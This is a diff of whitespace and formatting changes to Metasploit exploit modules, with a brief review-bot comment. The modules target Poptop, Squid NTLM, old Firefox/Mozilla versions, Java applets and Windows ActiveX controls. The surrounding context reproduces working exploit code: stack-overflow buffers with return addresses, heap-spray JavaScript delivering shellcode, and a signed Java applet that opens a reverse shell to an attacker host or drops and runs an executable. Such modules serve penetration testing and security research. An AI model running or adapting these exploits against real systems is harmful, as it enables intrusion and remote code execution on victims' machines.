(nops,sc,nops,ret) # K-sPecial: 84+(120*4) (sc,addrs) # bannedit: 265+8+250+29+16 shellcode = payload.encoded - + buf = "USER " buf << make_nops(265) # return address diff --git a/modules/exploits/linux/pptp/poptop_negative_read.rb b/modules/exploits/linux/pptp/poptop_negative_read.rb index f2f8689207..2e2ebf04a4 100644 --- a/modules/exploits/linux/pptp/poptop_negative_read.rb +++ b/modules/exploits/linux/pptp/poptop_negative_read.rb 
@@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -20,18 +18,18 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Brute def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Poptop Negative Read Overflow', 'Description' => %q{ - This is an exploit for the Poptop negative read overflow. This will - work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I - currently do not have a good way to detect Poptop versions. + This is an exploit for the Poptop negative read overflow. This will + work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I + currently do not have a good way to detect Poptop versions. - The server will by default only allow 4 concurrent manager processes - (what we run our code in), so you could have a max of 4 shells at once. + The server will by default only allow 4 concurrent manager processes + (what we run our code in), so you could have a max of 4 shells at once. - Using the current method of exploitation, our socket will be closed - before we have the ability to run code, preventing the use of Findsock. + Using the current method of exploitation, our socket will be closed + before we have the ability to run code, preventing the use of Findsock. }, 'Author' => 'spoonm', 'License' => MSF_LICENSE, 
@@ -57,10 +55,10 @@ class Metasploit3 < Msf::Exploit::Remote 'SaveRegisters' => [ 'esp' ], 'Platform' => 'linux', 'Arch' => ARCH_X86, - 'Targets' => + 'Targets' => [ - ['Linux Bruteforce', - { 'Bruteforce' => + ['Linux Bruteforce', + { 'Bruteforce' => { 'Start' => { 'Ret' => 0xbffffa00 }, 'Stop' => { 'Ret' => 0xbffff000 }, @@ -112,22 +110,22 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe end - + def brute_exploit(addrs) connect print_status("Trying #{"%.8x" % addrs['Ret']}...") # Construct the evil length packet - packet = + packet = build_packet(1) + payload.encoded + ([addrs['Ret']].pack('V') * (datastore['RetLength'] / 4)) sock.put(packet) - + handler disconnect end - + end diff --git a/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb b/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb index 99764623d8..8457729e82 100644 --- a/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb +++ b/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -20,10 +20,10 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Squid NTLM Authenticate Overflow', 'Description' => %q{ - This is an exploit for Squid's NTLM authenticate overflow + This is an exploit for Squid\'s NTLM authenticate overflow (libntlmssp.c). Due to improper bounds checking in ntlm_check_auth, it is possible to overflow the 'pass' variable on the stack with user controlled data of a user 
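Review bot: The backslash added in `Squid\'s` will most likely appear literally in the module description, since the enclosing literal is `%q{` (visible two lines earlier in this hunk) and Ruby's `%q` form only unescapes `\\` and its own delimiter, not `\'`; the unescaped apostrophe on the removed line was already valid inside braces. The line should go back to `This is an exploit for Squid's NTLM authenticate overflow`, or the escape should be dropped, so `info` does not carry a stray backslash into every listing of the module. The `initialize` method that this description belongs to continues past the end of the hunk.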
@@ -47,18 +47,18 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\x83\xec\x7f", }, - 'Targets' => + 'Targets' => [ - [ 'Linux Bruteforce', - { - 'Platform' => 'linux', - 'Bruteforce' => + [ 'Linux Bruteforce', + { + 'Platform' => 'linux', + 'Bruteforce' => { 'Start' => { 'Ret' => 0xbfffcfbc, 'Valid' => 0xbfffcf9c }, 'Stop' => { 'Ret' => 0xbffffffc, 'Valid' => 0xbffffffc }, 'Step' => 0 } - }, + }, ], ], 'DisclosureDate' => 'Jun 8 2004', @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote end def trasnmit_negotiate(site) - negotiate = + negotiate = "NTLMSSP\x00" + # NTLMSSP identifier "\x01\x00\x00\x00" + # NTLMSSP_NEGOTIATE "\x07\x00\xb2\x07" + # flags @@ -102,14 +102,14 @@ class Metasploit3 < Msf::Exploit::Remote "Proxy-Authorization: NTLM #{Rex::Text.encode_base64(negotiate)}\r\n" + "\r\n" sock.put(req) - + end def transmit_authenticate(site, addresses) - overflow = - rand_text_alphanumeric(0x20) + - [addresses['Ret']].pack('V') + - [addresses['Valid']].pack('V') + + overflow = + rand_text_alphanumeric(0x20) + + [addresses['Ret']].pack('V') + + [addresses['Valid']].pack('V') + "\xff\x00\x00\x00" shellcode = payload.encoded pass_len = [overflow.length + shellcode.length].pack('v') diff --git a/modules/exploits/multi/browser/firefox_escape_retval.rb b/modules/exploits/multi/browser/firefox_escape_retval.rb index e5d41c9607..6e01b21733 100644 --- a/modules/exploits/multi/browser/firefox_escape_retval.rb +++ b/modules/exploits/multi/browser/firefox_escape_retval.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking 
@@ -36,21 +34,21 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Firefox 3.5 escape() Return Value Memory Corruption', 'Description' => %q{ - This module exploits a memory corruption vulnerability in the Mozilla - Firefox browser. This flaw occurs when a bug in the javascript interpreter - fails to preserve the return value of the escape() function and results in - uninitialized memory being used instead. This module has only been tested - on Windows, but should work on other platforms as well with the current - targets. - + This module exploits a memory corruption vulnerability in the Mozilla + Firefox browser. This flaw occurs when a bug in the javascript interpreter + fails to preserve the return value of the escape() function and results in + uninitialized memory being used instead. This module has only been tested + on Windows, but should work on other platforms as well with the current + targets. }, 'License' => MSF_LICENSE, - 'Author' => [ - 'Simon Berry-Byrne ', # Author / Publisher / Original exploit - 'hdm', # Metasploit conversion - ], + 'Author' => + [ + 'Simon Berry-Byrne ', # Author / Publisher / Original exploit + 'hdm', # Metasploit conversion + ], 'Version' => '$Revision$', - 'References' => + 'References' => [ ['CVE', '2009-2477'], ['OSVDB', '55846'], @@ -64,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Targets' => [ - [ 'Firefox 3.5.0 on Windows XP SP0-SP3', + [ 'Firefox 3.5.0 on Windows XP SP0-SP3', { 'Platform' => 'win', 'Arch' => ARCH_X86, @@ -73,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Containers' => 800, } ], - [ 'Firefox 3.5.0 on Mac OS X 10.5.7 (Intel)', + [ 'Firefox 3.5.0 on Mac OS X 10.5.7 (Intel)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, @@ -86,8 +84,9 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 14 2006' )) - end + + def on_request_uri(cli, request) # Re-generate the payload 
@@ -97,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html; charset=utf-8' }) handler(cli) end - + def generate_html(payload) enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) @@ -105,18 +104,18 @@ class Metasploit3 < Msf::Exploit::Remote enc_ret = Rex::Text.to_unescape( Rex::Arch.endian(target.arch) == ENDIAN_LITTLE ? [target.ret].pack('V') : [target.ret].pack('N') ) - + var_data_str1 = Rex::Text.rand_text_alpha(3) var_data_str2 = Rex::Text.rand_text_alpha(4) js = %Q^ var xunescape = unescape; var shellcode = xunescape("#{enc_code}"); - + oneblock = xunescape("#{enc_ret}"); var fullblock = oneblock; -while (fullblock.length < #{target['BlockLen']}) +while (fullblock.length < #{target['BlockLen']}) { fullblock += fullblock; } @@ -125,7 +124,7 @@ var sprayContainer = new Array(); var sprayready = false; var sprayContainerIndex = 0; -function fill_function() +function fill_function() { if(! sprayready) { for (xi=0; xi<#{target['Containers']}/100; xi++, sprayContainerIndex++) @@ -142,7 +141,7 @@ function fill_function() } var searchArray = new Array(); - + function escapeData(data) { var xi; @@ -156,8 +155,8 @@ function escapeData(data) } return escData; } - -function DataTranslator() + +function DataTranslator() { searchArray = new Array(); searchArray[0] = new Array(); @@ -166,7 +165,7 @@ function DataTranslator() if (document.getElementsByTagName) { var xi=0; pTags = newElement.getElementsByTagName("p"); - if (pTags.length > 0) + if (pTags.length > 0) while (xi < pTags.length) { oTags = pTags[xi].getElementsByTagName("font"); 
@@ -178,37 +177,34 @@ function DataTranslator() } } } - + function GenerateHTML() { var xhtml = ""; for (xi=1;xi { - 'Variables' => %W{ DataTranslator GenerateHTML escapeData xunescape shellcode oneblock fullblock sprayContainer xi searchArray xc escData xhtml pTags oTags newElement sprayready sprayContainerIndex fill_function } - } -).to_s + # Obfuscate it up a bit + js = obfuscate_js(js, 'Symbols' => { + 'Variables' => %W{ DataTranslator GenerateHTML escapeData xunescape shellcode oneblock fullblock sprayContainer xi searchArray xc escData xhtml pTags oTags newElement sprayready sprayContainerIndex fill_function } + }).to_s -str1 = Rex::Text.rand_text_alpha(20) -str2 = Rex::Text.rand_text_alpha(24) -str3 = Rex::Text.rand_text_alpha(10) + " " + str1 = Rex::Text.rand_text_alpha(20) + str2 = Rex::Text.rand_text_alpha(24) + str3 = Rex::Text.rand_text_alpha(10) + " " - return %Q^

- +

diff --git a/modules/exploits/multi/browser/firefox_queryinterface.rb b/modules/exploits/multi/browser/firefox_queryinterface.rb index 3e1069f80f..e7cb5feb03 100644 --- a/modules/exploits/multi/browser/firefox_queryinterface.rb +++ b/modules/exploits/multi/browser/firefox_queryinterface.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -25,16 +23,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Firefox location.QueryInterface() Code Execution', 'Description' => %q{ - This module exploits a code execution vulnerability in the Mozilla - Firefox browser. To reliably exploit this vulnerability, we need to fill - almost a gigabyte of memory with our nop sled and payload. This module has - been tested on OS X 10.3 with the stock Firefox 1.5.0 package. - + This module exploits a code execution vulnerability in the Mozilla + Firefox browser. To reliably exploit this vulnerability, we need to fill + almost a gigabyte of memory with our nop sled and payload. This module has + been tested on OS X 10.3 with the stock Firefox 1.5.0 package. }, 'License' => MSF_LICENSE, 'Author' => ['hdm'], 'Version' => '$Revision$', - 'References' => + 'References' => [ ['CVE', '2006-0295'], ['OSVDB', '22893'], @@ -48,17 +45,17 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Targets' => [ - [ 'Firefox 1.5.0.0 Mac OS X', + [ 'Firefox 1.5.0.0 Mac OS X', { 'Platform' => 'osx', - 'Arch' => ARCH_PPC + 'Arch' => ARCH_PPC } ], - [ 'Firefox 1.5.0.0 Linux', + [ 'Firefox 1.5.0.0 Linux', { 'Platform' => 'linux', - 'Arch' => ARCH_X86, + 'Arch' => ARCH_X86, } ], ], 
@@ -67,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_request_uri(cli, request) - + # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) @@ -75,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' }) handler(cli) end - + def generate_html(payload) enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) diff --git a/modules/exploits/multi/browser/java_signed_applet.rb b/modules/exploits/multi/browser/java_signed_applet.rb index d407609629..3223a9540e 100644 --- a/modules/exploits/multi/browser/java_signed_applet.rb +++ b/modules/exploits/multi/browser/java_signed_applet.rb @@ -19,17 +19,16 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Java def initialize( info = {} ) - super( update_info( info, 'Name' => 'Signed Applet Social Engineering Code Exec', 'Description' => %q{ - This exploit dynamically creates an applet via the Msf::Exploit::Java mixin, converts it - to a .jar file, then signs the .jar with a dynamically created certificate containing - values of your choosing. This is presented to the end user via a web page with an applet + This exploit dynamically creates an applet via the Msf::Exploit::Java mixin, converts it + to a .jar file, then signs the .jar with a dynamically created certificate containing + values of your choosing. This is presented to the end user via a web page with an applet tag, loading the signed applet. - The user's JVM pops a dialog asking if they trust the signed applet and displays the - values chosen. Once the user clicks 'accept', the applet executes with full user + The user's JVM pops a dialog asking if they trust the signed applet and displays the + values chosen. Once the user clicks 'accept', the applet executes with full user permissions. The java payload used in this exploit is derived from Stephen Fewer's and HDM's payload 
@@ -52,13 +51,13 @@ class Metasploit3 < Msf::Exploit::Remote [ # Generic java payload is mostly useless right now, as it kills as soon as the user browses # to another page. It should be rewritten to launch a new JVM in the background with a custom - # .class. - # - # Look up the path to bin/java, dump .class to java.io.tmpdir, then bin/java foo.class via + # .class. + # + # Look up the path to bin/java, dump .class to java.io.tmpdir, then bin/java foo.class via # /bin/sh or cmd.exe [ 'Generic (Java Payload)', { - # This is a bad hack to force only the generic/shell_bind_tcp + # This is a bad hack to force only the generic/shell_bind_tcp # and generic/shell_reverse_tcp payloads 'Platform' => ['win'], 'Payload' => { 'Space' => 0 }, 
@@ -90,24 +89,24 @@ class Metasploit3 < Msf::Exploit::Remote } ], ], - 'DefaultTarget' => 1 - )) - register_options( - [ - OptString.new( 'CERTCN', [ true, "The CN= value for the certificate.", "Metasploit Inc." ]), - OptString.new( 'APPLETNAME', [ true, "The main applet's class name.", "SiteLoader" ]), - OptString.new('PAYLOADNAME', [ true, "The payload classes name.", "SiteSupport" ]), - - # Not implemented yet. - #OptString.new('PACKAGENAME', [ true, "The package name for gen'd classes.","x" ]), - #OptString.new('CUSTOMJAR', [ false, "A custom .jar applet to use.", nil]), - ], self.class) - register_advanced_options( - [ - OptString.new('SaveToFile', [ false, "When set, source is saved to this directory under external/source/", nil ]), - OptString.new('Template', [ true, "The default executable template to use", File.join(Msf::Config.install_root, "data", "templates", "template.exe") ]), - OptString.new('InsertPayload', [ false, "Inject payload into template without affecting executable behavior", nil ]) - ], self.class) + 'DefaultTarget' => 1 + )) + register_options( + [ + OptString.new( 'CERTCN', [ true, "The CN= value for the certificate.", "Metasploit Inc." ]), + OptString.new( 'APPLETNAME', [ true, "The main applet's class name.", "SiteLoader" ]), + OptString.new('PAYLOADNAME', [ true, "The payload classes name.", "SiteSupport" ]), + + # Not implemented yet. 
+ #OptString.new('PACKAGENAME', [ true, "The package name for gen'd classes.","x" ]), + #OptString.new('CUSTOMJAR', [ false, "A custom .jar applet to use.", nil]), + ], self.class) + register_advanced_options( + [ + OptString.new('SaveToFile', [ false, "When set, source is saved to this directory under external/source/", nil ]), + OptString.new('Template', [ true, "The default executable template to use", File.join(Msf::Config.install_root, "data", "templates", "template.exe") ]), + OptString.new('InsertPayload', [ false, "Inject payload into template without affecting executable behavior", nil ]) + ], self.class) end @@ -131,12 +130,12 @@ class Metasploit3 < Msf::Exploit::Remote appletsource = get_code save_to_file( appletsource['classnames'], appletsource['codefiles'], datastore['SaveToFile'] ) end - - super + + super end - + def get_code - + appletsource = %Q^ /* */ @@ -163,35 +162,35 @@ public class #{datastore['APPLETNAME']} extends Applet public void init() { try - { + { String data = getParameter( "data" ); String lhost = getParameter( "lhost" ); String lport = getParameter( "lport" ); - + if( data == null ) { data = ""; } - + //System.out.println("Applet executing. Creating payload class."); - + #{datastore['PAYLOADNAME']} site = new #{datastore['PAYLOADNAME']} (); //System.out.println("Payload class instantiated."); site.data = data; - + if( lhost != null && lport != null) { site.lhost = lhost; site.lport = Integer.parseInt(lport); System.out.println("lhost: " + lhost); System.out.println("lport: " + Integer.parseInt(lport)); } - + //System.out.println("data: " + data); site.run(); } catch( Exception e ) { System.out.println("Applet error: " + e); } } - + class #{datastore['PAYLOADNAME']} implements PrivilegedExceptionAction { // This will contain a hex string of the native payload to drop and execute. 
@@ -200,23 +199,23 @@ public class #{datastore['APPLETNAME']} extends Applet // reverse shell. public String lhost = null; public int lport = 4444; - + class StreamConnector extends Thread { InputStream is; OutputStream os; - + StreamConnector( InputStream is, OutputStream os ) { this.is = is; this.os = os; } - + public void run() { BufferedReader in = null; BufferedWriter out = null; - + try { in = new BufferedReader( new InputStreamReader( is ) ); @@ -230,7 +229,7 @@ public class #{datastore['APPLETNAME']} extends Applet } } catch( Exception e ) { System.out.println( "StreamConnector error: " + e); } - + try { if( in != null ) @@ -241,26 +240,26 @@ public class #{datastore['APPLETNAME']} extends Applet catch( Exception e ) { System.out.println( "StreamConnector error: " + e); } } } - + // http://stackoverflow.com/questions/140131/convert-a-string-representation-of-a-hex-dump-to-a-byte-array-using-java public byte[] StringToBytes( String s ) { byte[] data = new byte[s.length() / 2]; - + for( int i = 0 ; i < s.length() ; i += 2 ) data[i / 2] = (byte)( ( Character.digit( s.charAt( i ), 16 ) << 4 ) + Character.digit( s.charAt( i + 1 ), 16 ) ); - + return data; } - + public Object run() throws Exception { //System.out.println("Applet running..."); - + try { String os = System.getProperty( "os.name" ); - + // if we have no native payload to drop and execute we default to // either a TCP bind or reverse shell. //if( #{datastore['PAYLOADNAME']}.data.length() == 0 ) @@ -268,12 +267,12 @@ public class #{datastore['APPLETNAME']} extends Applet { //System.out.println("Applet thinks payload.data is empty."); Socket client_socket = null; - + String shell = "/bin/sh"; - + if( os.indexOf( "Windows" ) >= 0 ) shell = "cmd.exe"; - + //if( #{datastore['PAYLOADNAME']}.lhost == null ) if( this.lhost == null ) { 
@@ -286,15 +285,15 @@ public class #{datastore['APPLETNAME']} extends Applet //client_socket = new Socket( #{datastore['PAYLOADNAME']}.lhost, #{datastore['PAYLOADNAME']}.lport ); client_socket = new Socket( this.lhost, this.lport ); } - + if( client_socket != null ) { Process process = Runtime.getRuntime().exec( shell ); - + ( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start(); ( new StreamConnector( process.getErrorStream(), client_socket.getOutputStream() ) ).start(); - + ( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start(); } } @@ -304,33 +303,33 @@ public class #{datastore['APPLETNAME']} extends Applet String filename = Math.random() + ".exe"; String path = System.getProperty( "java.io.tmpdir" ) + File.separator + filename; //System.out.println(filename + " written."); - + Process p; FileOutputStream fos = new FileOutputStream( path ); - + //fos.write( StringToBytes( #{datastore['PAYLOADNAME']}.data ) ); fos.write( StringToBytes( this.data ) ); fos.close(); - + if( os.indexOf( "Windows" ) < 0 ) { p = Runtime.getRuntime().exec( "chmod 755 " + path ); p.waitFor(); } - + p = Runtime.getRuntime().exec( path ); - + p.waitFor(); - + new File( path ).delete(); } } catch( Exception e ) { System.out.println("Payload execution error: " + e); } - + return null; } - + public void #{datastore['PAYLOADNAME']}() { try @@ -373,7 +372,7 @@ public class #{datastore['APPLETNAME']} extends Applet print_status( "Failed to generate the payload." ) return end - + if target['Arch'] == ARCH_X86 if target['Platform'] == 'win' opts = { :template => datastore['Template'], :insert => datastore['InsertPayload'] } 
@@ -381,7 +380,7 @@ public class #{datastore['APPLETNAME']} extends Applet end data = Msf::Util::EXE.to_osx_x86_macho( framework, payload.encoded ) if target['Platform'] == 'osx' data = Msf::Util::EXE.to_linux_x86_elf( framework, payload.encoded ) if target['Platform'] == 'linux' - + elsif target['Arch'] == ARCH_PPC data = Msf::Util::EXE.to_osx_ppc_macho( framework, payload.encoded ) if target['Platform'] == 'osx' end @@ -400,12 +399,12 @@ public class #{datastore['APPLETNAME']} extends Applet print_status "Compiling applet classes..." compile( appletcode['classnames'], appletcode['codefiles'] ) - + print_status "Compile completed. Building jar file..." unsignedjar = "unsigned_#{datastore['APPLETNAME']}.jar" @signedjar = "#{datastore['APPLETNAME']}.jar" - + build_jar( unsignedjar, [ # Applet datastore['APPLETNAME'] + ".class", 
@@ -413,34 +412,34 @@ public class #{datastore['APPLETNAME']} extends Applet datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + ".class", # PayloadX StreamConnector for pure Java payload datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + "$StreamConnector.class" ] ) - + print_status "Jar built. Signing..." - + sign_jar( datastore['CERTCN'], unsignedjar, @signedjar ) - + print_status "Jar signed. Ready to send." else print_status "Using static, signed jar. Ready to send." end - + # TODO: gzip data and parse in java send_response_html( cli, generate_html( data, host, port ), { 'Content-Type' => 'text/html' } ) return end - + # load the jar file if @use_static path = File.join( Msf::Config.install_root, "data", "exploits", "java_signed_applet.jar" ) elsif File.exists? File.join( datastore['JAVACACHE'], @signedjar ) path = File.join( datastore['JAVACACHE'], @signedjar ) end - + if path fd = File.open( path, "rb" ) @jar_data = fd.read(fd.stat.size) fd.close end - + print_status( "Sending #{datastore['APPLETNAME']}.jar to #{cli.peerhost}:#{cli.peerport}. Waiting for user to click 'accept'..." ) send_response( cli, @jar_data, { 'Content-Type' => "application/octet-stream" } ) @@ -462,5 +461,4 @@ public class #{datastore['APPLETNAME']} extends Applet return html end - end diff --git a/modules/exploits/multi/browser/mozilla_compareto.rb b/modules/exploits/multi/browser/mozilla_compareto.rb index 20136b40fd..c08110fa1b 100644 --- a/modules/exploits/multi/browser/mozilla_compareto.rb +++ b/modules/exploits/multi/browser/mozilla_compareto.rb 
@@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -38,15 +36,14 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution', 'Description' => %q{ - This module exploits a code execution vulnerability in the Mozilla - Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit - module is a direct port of Aviv Raff's HTML PoC. - + This module exploits a code execution vulnerability in the Mozilla + Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit + module is a direct port of Aviv Raff's HTML PoC. }, 'License' => MSF_LICENSE, 'Author' => ['hdm', 'Aviv Raff '], 'Version' => '$Revision$', - 'References' => + 'References' => [ ['CVE', '2005-2265'], ['OSVDB', '17968'], @@ -62,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote [ # Tested against Firefox 1.0.4 and Mozilla 1.7.1 on # WinXP-SP3 and Win2kAS-SP0 - [ 'Firefox < 1.0.5, Mozilla < 1.7.10, Windows', + [ 'Firefox < 1.0.5, Mozilla < 1.7.10, Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86, 
@@ -76,22 +73,22 @@ class Metasploit3 < Msf::Exploit::Remote end def on_request_uri(cli, request) - + # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' }) - + # Handle the payload handler(cli) end - + def generate_html(payload) enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch)) - + spray_to = sprintf("0x%.8x", target.ret) spray_slide1 = Rex::Text.to_unescape( [target.ret].pack('V'), Rex::Arch.endian(target.arch) ) spray_slide2 = Rex::Text.to_unescape( [target.ret].pack('V'), Rex::Arch.endian(target.arch) ) @@ -100,15 +97,15 @@ class Metasploit3 < Msf::Exploit::Remote return %Q| - One second please... " content << <<-ENDEMBED - - @@ -140,10 +138,10 @@ class Metasploit3 < Msf::Exploit::Remote content << "" end - send_response(client, content, { 'Content-Type' => "text/html" }) - + send_response(client, content, { 'Content-Type' => "text/html" }) + # Handle the payload - handler(client) + handler(client) end def build_qtl(overflow) @@ -155,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Remote content << "moviename=\"#{cruft}\" \n" content << "qtnext=\"#{cruft}\" \n" content << "type=\"video/quicktime\" \n" - content << "src=\"rtsp://#{cruft}:#{overflow}\" />\n" + content << "src=\"rtsp://#{cruft}:#{overflow}\" />\n" end end diff --git a/modules/exploits/windows/browser/ask_shortformat.rb b/modules/exploits/windows/browser/ask_shortformat.rb index bd5cc0f58a..39416ac6dd 100644 --- a/modules/exploits/windows/browser/ask_shortformat.rb +++ b/modules/exploits/windows/browser/ask_shortformat.rb 
@@ -23,13 +23,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Ask.com Toolbar 4.0.2.53. - An attacker may be able to excute arbitrary code by sending an overly - long string to the "ShortFormat()" method in askbar.dll. + An attacker may be able to excute arbitrary code by sending an overly + long string to the "ShortFormat()" method in askbar.dll. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], + 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-5107' ], [ 'OSVDB', '37735' ], @@ -70,28 +70,27 @@ class Metasploit3 < Msf::Exploit::Remote # Randomize some things vname = rand_text_alpha(rand(100) + 1) strname = rand_text_alpha(rand(100) + 1) - - # Set the exploit buffer + + # Set the exploit buffer filler = rand_text_alpha(target['Offset']) seh = generate_seh_payload(target.ret) - sploit = filler + seh + rand_text_alpha(payload.encoded.length) - + sploit = filler + seh + rand_text_alpha(payload.encoded.length) + # Build out the message - content = %Q| - - - - - | - + content = %Q| + + + +| + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/athocgov_completeinstallation.rb b/modules/exploits/windows/browser/athocgov_completeinstallation.rb index 91a07e5153..0d56784a3b 100644 --- a/modules/exploits/windows/browser/athocgov_completeinstallation.rb +++ b/modules/exploits/windows/browser/athocgov_completeinstallation.rb 
@@ -1,9 +1,13 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/projects/Framework/ -### +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## require 'msf/core' @@ -18,13 +22,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack overflow in AtHocGov IWSAlerts. When sending an overly long string to the CompleteInstallation() method of AtHocGovTBr.dll - (6.1.4.36) an attacker may be able to execute arbitrary code. This + (6.1.4.36) an attacker may be able to execute arbitrary code. This vulnerability was silently patched by the vendor. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], + 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'URL', 'http://www.athoc.com/products/IWSAlerts_overview.aspx' ], [ 'URL', 'http://www.metasploit.com/' ], @@ -41,15 +45,15 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ] + [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ] ], 'DisclosureDate' => 'Feb 15 2008', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('URIPATH', [ true, "The URI to use.", "/" ]) - ], self.class) + register_options( + [ + OptString.new('URIPATH', [ true, "The URI to use.", "/" ]) + ], self.class) end def autofilter 
@@ -66,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote # Encode the shellcode. shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - + ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, "or cl,[edx]").encode_string * 2) js = %Q| @@ -88,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote opts = { 'Strings' => true, 'Symbols' => { - 'Variables' => [ + 'Variables' => [ 'vulnerable', 'shellcode', 'my_unescape', @@ -108,13 +112,13 @@ class Metasploit3 < Msf::Exploit::Remote // - | + | print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end @@ -122,8 +126,8 @@ class Metasploit3 < Msf::Exploit::Remote end =begin IDL info... - [id(0x00000022)] - HRESULT CompleteInstallation([in] BSTR strParam); + [id(0x00000022)] + HRESULT CompleteInstallation([in] BSTR strParam); $~/trunk/./msfpescan -f AtHocGovTBr.dll AtHocGovTBr.dll: Microsoft Visual C++ v7.1 EXE [165] diff --git a/modules/exploits/windows/browser/autodesk_idrop.rb b/modules/exploits/windows/browser/autodesk_idrop.rb index 6840dd020a..31648ba79b 100644 --- a/modules/exploits/windows/browser/autodesk_idrop.rb +++ b/modules/exploits/windows/browser/autodesk_idrop.rb 